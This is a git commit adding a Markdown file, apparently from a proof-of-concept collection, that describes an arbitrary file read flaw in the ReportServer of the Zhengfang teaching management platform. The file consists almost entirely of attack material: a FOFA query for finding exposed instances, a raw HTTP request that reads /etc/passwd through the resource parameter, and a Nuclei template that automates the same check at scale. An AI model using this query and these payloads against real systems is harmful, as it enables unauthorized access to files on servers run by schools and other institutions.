Create 正方教学管理信息服务平台ReportServer存在任意文件读取漏洞.md
This commit is contained in:
parent
246d9812ed
commit
d6d6195fd7
40
正方教学管理信息服务平台ReportServer存在任意文件读取漏洞.md
Normal file
40
正方教学管理信息服务平台ReportServer存在任意文件读取漏洞.md
Normal file
@ -0,0 +1,40 @@
|
|||||||
|
## 正方教学管理信息服务平台ReportServer存在任意文件读取漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
body="正方软件股份有限公司" && title="教学管理信息服务平台"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true HTTP/1.1
|
||||||
|
Host:
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||||
|
Content-Length: 0
|
||||||
|
|
||||||
|
```
|
||||||
|

|
||||||
|
|
||||||
|
## Nuclei脚本
|
||||||
|
```
|
||||||
|
id: zfjxgl-reportserver-anyfileread
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: zfjxgl-reportserver-anyfileread
|
||||||
|
author: xxxx
|
||||||
|
severity: high
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /WebReport/ReportServer?op=resource&resource=/etc/passwd&i18n=true HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: text/plain
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- status_code==200 && contains_all(body,"root")
|
||||||
|
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user